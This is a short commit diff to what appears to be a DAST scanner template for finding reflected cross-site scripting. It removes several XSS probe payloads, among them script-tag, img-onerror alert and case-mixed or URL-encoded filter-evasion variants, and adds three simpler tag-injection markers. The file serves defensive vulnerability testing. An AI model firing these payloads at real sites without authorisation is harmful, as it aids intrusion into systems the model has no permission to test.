updated payloads

dast/vulnerabilities/xss/reflected-xss.yaml

@@ -19,17 +19,9 @@ http:
 
     payloads:
       reflection:
-        - "'\"><{{first}}"
-        - "<img src=x onerror=alert({{first}})>"
-        - "<script>alert({{first}})</script>"
-        - "'><ScRiPt>alert({{first}})</sCrIpT>"
-        - "</script><ScRiPt>alert({{first}})</sCrIpT>"
-        - "</script><script>alert({{first}})</script>"
-        - "<body onload=alert({{first}})>"
-        - "<marquee><img src=x onerror=confirm({{first}})></marquee>"
-        - "'><img%20src=xxx:x%20\x20onerror=javascript:alert({{first}})>"
-        - "'\"><img%20s+src+c=x%20on+onerror+%20=alert({{first}})>"
-        - "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o"
+        - "'\"><{{first}}>"
+        - "'><{{first}}>"
+        - "\"><{{first}}>"
 
     fuzzing:
       - part: query
@@ -49,4 +41,4 @@ http:
       - type: word
         part: header
         words:
-          - "text/html"
+          - "text/html"